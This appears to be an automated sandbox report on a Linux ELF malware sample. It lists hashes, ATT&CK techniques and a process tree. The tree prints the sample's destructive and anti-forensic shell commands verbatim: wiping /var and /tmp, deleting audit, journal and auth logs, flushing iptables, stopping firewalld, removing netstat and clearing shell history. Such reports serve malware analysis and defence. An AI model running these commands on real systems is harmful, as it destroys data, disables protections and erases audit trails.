b18fd19ba74bb9322a684d9fceda45d57c587f6d2488b8b45a093531762d0020

Analysis

max time kernel
117s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
23/02/2025, 02:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b18fd19ba74bb9322a684d9fceda45d57c587f6d2488b8b45a093531762d0020.elf
Size

124KB
MD5

2753bd027c47e340f8c86dd68384e07a
SHA1

1da23843004df8c95c61775c9134a7202a1569aa
SHA256

b18fd19ba74bb9322a684d9fceda45d57c587f6d2488b8b45a093531762d0020
SHA512

def2bf3bc23898118096313f80921ff1aa7ae971d3c8bd32476e865f0e4fb10230822f91a1dd524870fd8270f7df22adba372ec3aeaa8816d47a859fbcf7a5da
SSDEEP

3072:Oxue61TMvUrvllA0F+6NcAphaDD65k+Lm5t4WthVz:A+vltZphaDgm5t4OhVz

Score

7^/10

defense_evasion discovery privilege_escalation

Malware Config

Signatures

Deletes Audit logs 1 TTPs 1 IoCs

Deletes logs related to the Linux Audit framework.

defense_evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File deleted	/var/log/audit/audit.log	rm

Deletes itself 1 IoCs

pid	Process
1506	b18fd19ba74bb9322a684d9fceda45d57c587f6d2488b8b45a093531762d0020.elf

Deletes journal logs 1 TTPs 4 IoCs

Deletes systemd journal logs. Likely to evade detection.

defense_evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File deleted	/var/log/journal/11c67417355f45d397f6be11f62e85a6/[email protected]~	rm
File deleted	/var/log/journal/11c67417355f45d397f6be11f62e85a6/system.journal	rm
File deleted	/var/log/journal/11c67417355f45d397f6be11f62e85a6/system@4085758360a1440080f071019b4ef087-0000000000000001-00061aa0a0a26e87.journal	rm
File deleted	/var/log/journal/11c67417355f45d397f6be11f62e85a6	rm

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

defense_evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File deleted	/var/log/syslog	rm

Flushes firewall rules 1 TTPs 9 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

pid	Process
1521	iptables
1559	iptables
1561	systemctl
1561	systemctl
1561	systemctl
1561	systemctl
1558	iptables
1561	systemctl
1561	systemctl

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Adversary-in-the-Middle

T1557

description	ioc	Process
File opened for modification	/etc/resolv.conf	b18fd19ba74bb9322a684d9fceda45d57c587f6d2488b8b45a093531762d0020.elf

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

pid	Process
1510	rm

Deletes log files 1 TTPs 40 IoCs

Deletes log files on the system.

defense_evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File deleted	/var/log/installer/cdebconf/questions.dat	rm
File deleted	/var/log/unattended-upgrades	rm
File deleted	/var/log/dist-upgrade	rm
File deleted	/var/log/lastlog	rm
File deleted	/var/log/cups	rm
File deleted	/var/log/apt/history.log	rm
File deleted	/var/log/Xorg.0.log	rm
File deleted	/var/log/wtmp	rm
File deleted	/var/log/cups/access_log	rm
File deleted	/var/log/gdm3	rm
File deleted	/var/log/ubuntu-advantage.log	rm
File deleted	/var/log/gpu-manager.log	rm
File deleted	/var/log/dpkg.log	rm
File deleted	/var/log/Xorg.0.log.old	rm
File deleted	/var/log/kern.log	rm
File deleted	/var/log/installer/initial-status.gz	rm
File deleted	/var/log/audit	rm
File deleted	/var/log/unattended-upgrades/unattended-upgrades-shutdown.log	rm
File deleted	/var/log/journal	rm
File deleted	/var/log/apt/eipp.log.xz	rm
File deleted	/var/log/installer/hardware-summary	rm
File deleted	/var/log/installer/status	rm
File deleted	/var/log/auth.log	rm
File deleted	/var/log/faillog	rm
File deleted	/var/log/tallylog	rm
File deleted	/var/log/installer/syslog	rm
File deleted	/var/log/installer/partman	rm
File deleted	/var/log/alternatives.log	rm
File deleted	/var/log/fontconfig.log	rm
File deleted	/var/log/apt/term.log	rm
File deleted	/var/log/apt	rm
File deleted	/var/log/installer/cdebconf/templates.dat	rm
File deleted	/var/log/installer/cdebconf	rm
File deleted	/var/log/installer/lsb-release	rm
File deleted	/var/log/installer	rm
File deleted	/var/log/hp/tmp	rm
File deleted	/var/log/speech-dispatcher	rm
File deleted	/var/log/wtmp	rm
File deleted	/var/log/hp	rm
File deleted	/var/log/btmp	rm

Enumerates running processes
Discovers information about currently running processes on the system

Reads system routing table 1 TTPs 1 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	b18fd19ba74bb9322a684d9fceda45d57c587f6d2488b8b45a093531762d0020.elf

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	xoomukxcde	1506	b18fd19ba74bb9322a684d9fceda45d57c587f6d2488b8b45a093531762d0020.elf

Reads CPU attributes 1 TTPs 3 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	b18fd19ba74bb9322a684d9fceda45d57c587f6d2488b8b45a093531762d0020.elf

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/177/cmdline	pkill
File opened for reading	/proc/1334/cmdline	pkill
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/19/status	pkill
File opened for reading	/proc/78/cmdline	pkill
File opened for reading	/proc/18/cmdline	pkill
File opened for reading	/proc/98/status	pkill
File opened for reading	/proc/1127/cmdline	pkill
File opened for reading	/proc/945/cmdline	pkill
File opened for reading	/proc/1111/cmdline	pkill
File opened for reading	/proc/32/status	pkill
File opened for reading	/proc/954/cmdline	pkill
File opened for reading	/proc/959/status	pkill
File opened for reading	/proc/28/status	pkill
File opened for reading	/proc/1140/status	pkill
File opened for reading	/proc/667/status	pkill
File opened for reading	/proc/1190/cmdline	pkill
File opened for reading	/proc/173/cmdline	pkill
File opened for reading	/proc/954/status	pkill
File opened for reading	/proc/1176/cmdline	pkill
File opened for reading	/proc/1181/status	pkill
File opened for reading	/proc/410/status	pkill
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/1269/cmdline	pkill
File opened for reading	/proc/444/status	pkill
File opened for reading	/proc/1141/cmdline	pkill
File opened for reading	/proc/634/status	pkill
File opened for reading	/proc/1269/status	pkill
File opened for reading	/proc/1334/status	pkill
File opened for reading	/proc/164/cmdline	pkill
File opened for reading	/proc/174/cmdline	pkill
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/513/status	pkill
File opened for reading	/proc/1065/status	pkill
File opened for reading	/proc/1169/status	pkill
File opened for reading	/proc/1123/status	pkill
File opened for reading	/proc/1176/cmdline	pkill
File opened for reading	/proc/20/cmdline	pkill
File opened for reading	/proc/1223/status	pkill
File opened for reading	/proc/171/cmdline	pkill
File opened for reading	/proc/688/cmdline	pkill
File opened for reading	/proc/172/cmdline	pkill
File opened for reading	/proc/954/status	pkill
File opened for reading	/proc/17/cmdline	pkill
File opened for reading	/proc/490/cmdline	pkill
File opened for reading	/proc/949/cmdline	pkill
File opened for reading	/proc/439/status	pkill
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/9/cmdline	pkill
File opened for reading	/proc/173/status	pkill
File opened for reading	/proc/1190/cmdline	pkill
File opened for reading	/proc/3/status	pkill
File opened for reading	/proc/439/cmdline	pkill
File opened for reading	/proc/1068/status	pkill
File opened for reading	/proc/1298/status	pkill
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/20/cmdline	pkill
File opened for reading	/proc/89/status	pkill

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1557	sh
1520	sh
1530	sh
1531	service

/tmp/b18fd19ba74bb9322a684d9fceda45d57c587f6d2488b8b45a093531762d0020.elf
/tmp/b18fd19ba74bb9322a684d9fceda45d57c587f6d2488b8b45a093531762d0020.elf
1⤵
- Deletes itself
- Writes DNS configuration
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1506
- /bin/sh
  sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"
  2⤵
  PID:1509
- - /bin/rm
    rm -rf /tmp/config-err-6aBU03 /tmp/netplan_cmehilj5 /tmp/snap-private-tmp /tmp/ssh-de3qHQhlbyqj /tmp/systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV /tmp/systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev /tmp/systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A /tmp/systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 /tmp/systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-HINU92 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/agetty.reload /var/run/atd.pid /var/run/auditd.pid /var/run/avahi-daemon /var/run/boltd /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cups /var/run/dbus /var/run/dhclient-ens3.pid /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/lock /var/run/log /var/run/mount /var/run/network /var/run/pppconfig /var/run/rsyslogd.pid /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/user /var/run/utmp /var/run/uuidd /var/tmp/systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-6JNGJj /var/tmp/systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-0S5tA2 /var/tmp/systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-QEFRr9 /var/tmp/systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-2ygiXw /var/tmp/systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-8wLhDB
    3⤵
    - Deletes Audit logs
    - Deletes journal logs
    - Deletes system logs
    - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
    - Deletes log files
    PID:1510
- /bin/sh
  sh -c "rm -rf /var/log/wtmp"
  2⤵
  PID:1514
- - /bin/rm
    rm -rf /var/log/wtmp
    3⤵
    - Deletes log files
    PID:1515
- /bin/sh
  sh -c "rm -rf /tmp/*"
  2⤵
  PID:1516
- - /bin/rm
    rm -rf "/tmp/*"
    3⤵
    PID:1517
- /bin/sh
  sh -c "rm -rf /bin/netstat"
  2⤵
  PID:1518
- - /bin/rm
    rm -rf /bin/netstat
    3⤵
    PID:1519
- /bin/sh
  sh -c "iptables -F"
  2⤵
  - System Network Configuration Discovery
  PID:1520
- - /sbin/iptables
    iptables -F
    3⤵
    - Flushes firewall rules
    PID:1521
- /bin/sh
  sh -c "pkill -9 busybox"
  2⤵
  PID:1524
- - /usr/bin/pkill
    pkill -9 busybox
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1525
- /bin/sh
  sh -c "pkill -9 perl"
  2⤵
  PID:1526
- - /usr/bin/pkill
    pkill -9 perl
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1527
- /bin/sh
  sh -c "pkill -9 python"
  2⤵
  PID:1528
- - /usr/bin/pkill
    pkill -9 python
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1529
- /bin/sh
  sh -c "service iptables stop"
  2⤵
  - System Network Configuration Discovery
  PID:1530
- - /usr/sbin/service
    service iptables stop
    3⤵
    - System Network Configuration Discovery
    PID:1531
  - - /usr/bin/basename
      basename /usr/sbin/service
      4⤵
      PID:1532
  - - /usr/bin/basename
      basename /usr/sbin/service
      4⤵
      PID:1533
  - - /bin/systemctl
      systemctl --quiet is-active multi-user.target
      4⤵
      PID:1534
  - - /bin/sed
      sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
      4⤵
      PID:1537
  - - /bin/systemctl
      systemctl list-unit-files --full "--type=socket"
      4⤵
      Reads runtime system information
      PID:1536
  - - /bin/systemctl
      systemctl -p Triggers show acpid.socket
      4⤵
      Reads runtime system information
      PID:1538
  - - /bin/systemctl
      systemctl -p Triggers show apport-forward.socket
      4⤵
      PID:1539
  - - /bin/systemctl
      systemctl -p Triggers show avahi-daemon.socket
      4⤵
      PID:1540
  - - /bin/systemctl
      systemctl -p Triggers show cups.socket
      4⤵
      PID:1541
  - - /bin/systemctl
      systemctl -p Triggers show dbus.socket
      4⤵
      PID:1542
  - - /bin/systemctl
      systemctl -p Triggers show saned.socket
      4⤵
      PID:1543
  - - /bin/systemctl
      systemctl -p Triggers show snapd.socket
      4⤵
      PID:1544
  - - /bin/systemctl
      systemctl -p Triggers show ssh.socket
      4⤵
      PID:1545
  - - /bin/systemctl
      systemctl -p Triggers show syslog.socket
      4⤵
      PID:1546
  - - /bin/systemctl
      systemctl -p Triggers show systemd-fsckd.socket
      4⤵
      PID:1547
  - - /bin/systemctl
      systemctl -p Triggers show systemd-initctl.socket
      4⤵
      PID:1548
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald-audit.socket
      4⤵
      PID:1549
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald-dev-log.socket
      4⤵
      PID:1550
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald.socket
      4⤵
      PID:1551
  - - /bin/systemctl
      systemctl -p Triggers show systemd-networkd.socket
      4⤵
      Reads runtime system information
      PID:1552
  - - /bin/systemctl
      systemctl -p Triggers show systemd-rfkill.socket
      4⤵
      PID:1553
  - - /bin/systemctl
      systemctl -p Triggers show systemd-udevd-control.socket
      4⤵
      PID:1554
  - - /bin/systemctl
      systemctl -p Triggers show systemd-udevd-kernel.socket
      4⤵
      PID:1555
  - - /bin/systemctl
      systemctl -p Triggers show uuidd.socket
      4⤵
      Reads runtime system information
      PID:1556
- - /usr/local/sbin/systemctl
    systemctl stop iptables.service
    3⤵
    PID:1531
- - /usr/local/bin/systemctl
    systemctl stop iptables.service
    3⤵
    PID:1531
- - /usr/sbin/systemctl
    systemctl stop iptables.service
    3⤵
    PID:1531
- - /usr/bin/systemctl
    systemctl stop iptables.service
    3⤵
    PID:1531
- - /sbin/systemctl
    systemctl stop iptables.service
    3⤵
    PID:1531
- - /bin/systemctl
    systemctl stop iptables.service
    3⤵
    PID:1531
- /bin/sh
  sh -c "/sbin/iptables -F; /sbin/iptables -X"
  2⤵
  - System Network Configuration Discovery
  PID:1557
- - /sbin/iptables
    /sbin/iptables -F
    3⤵
    - Flushes firewall rules
    PID:1558
- - /sbin/iptables
    /sbin/iptables -X
    3⤵
    - Flushes firewall rules
    PID:1559
- /bin/sh
  sh -c "service firewalld stop"
  2⤵
  PID:1560
- - /usr/sbin/service
    service firewalld stop
    3⤵
    PID:1561
  - - /usr/bin/basename
      basename /usr/sbin/service
      4⤵
      PID:1562
  - - /usr/bin/basename
      basename /usr/sbin/service
      4⤵
      PID:1563
  - - /bin/systemctl
      systemctl --quiet is-active multi-user.target
      4⤵
      PID:1564
  - - /bin/sed
      sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
      4⤵
      PID:1567
  - - /bin/systemctl
      systemctl list-unit-files --full "--type=socket"
      4⤵
      PID:1566
  - - /bin/systemctl
      systemctl -p Triggers show acpid.socket
      4⤵
      Reads runtime system information
      PID:1568
  - - /bin/systemctl
      systemctl -p Triggers show apport-forward.socket
      4⤵
      PID:1569
  - - /bin/systemctl
      systemctl -p Triggers show avahi-daemon.socket
      4⤵
      Reads runtime system information
      PID:1570
  - - /bin/systemctl
      systemctl -p Triggers show cups.socket
      4⤵
      PID:1571
  - - /bin/systemctl
      systemctl -p Triggers show dbus.socket
      4⤵
      Reads runtime system information
      PID:1572
  - - /bin/systemctl
      systemctl -p Triggers show saned.socket
      4⤵
      PID:1573
  - - /bin/systemctl
      systemctl -p Triggers show snapd.socket
      4⤵
      PID:1574
  - - /bin/systemctl
      systemctl -p Triggers show ssh.socket
      4⤵
      PID:1575
  - - /bin/systemctl
      systemctl -p Triggers show syslog.socket
      4⤵
      PID:1576
  - - /bin/systemctl
      systemctl -p Triggers show systemd-fsckd.socket
      4⤵
      PID:1577
  - - /bin/systemctl
      systemctl -p Triggers show systemd-initctl.socket
      4⤵
      PID:1578
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald-audit.socket
      4⤵
      Reads runtime system information
      PID:1579
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald-dev-log.socket
      4⤵
      PID:1580
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald.socket
      4⤵
      PID:1581
  - - /bin/systemctl
      systemctl -p Triggers show systemd-networkd.socket
      4⤵
      PID:1582
  - - /bin/systemctl
      systemctl -p Triggers show systemd-rfkill.socket
      4⤵
      PID:1583
  - - /bin/systemctl
      systemctl -p Triggers show systemd-udevd-control.socket
      4⤵
      PID:1584
  - - /bin/systemctl
      systemctl -p Triggers show systemd-udevd-kernel.socket
      4⤵
      Reads runtime system information
      PID:1585
  - - /bin/systemctl
      systemctl -p Triggers show uuidd.socket
      4⤵
      PID:1586
- - /usr/local/sbin/systemctl
    systemctl stop firewalld.service
    3⤵
    - Flushes firewall rules
    PID:1561
- - /usr/local/bin/systemctl
    systemctl stop firewalld.service
    3⤵
    - Flushes firewall rules
    PID:1561
- - /usr/sbin/systemctl
    systemctl stop firewalld.service
    3⤵
    - Flushes firewall rules
    PID:1561
- - /usr/bin/systemctl
    systemctl stop firewalld.service
    3⤵
    - Flushes firewall rules
    PID:1561
- - /sbin/systemctl
    systemctl stop firewalld.service
    3⤵
    - Flushes firewall rules
    PID:1561
- - /bin/systemctl
    systemctl stop firewalld.service
    3⤵
    - Flushes firewall rules
    - Reads runtime system information
    PID:1561
- /bin/sh
  sh -c "rm -rf ~/.bash_history"
  2⤵
  PID:1587
- - /bin/rm
    rm -rf "~/.bash_history"
    3⤵
    PID:1588
- /bin/sh
  sh -c "history -c"
  2⤵
  PID:1589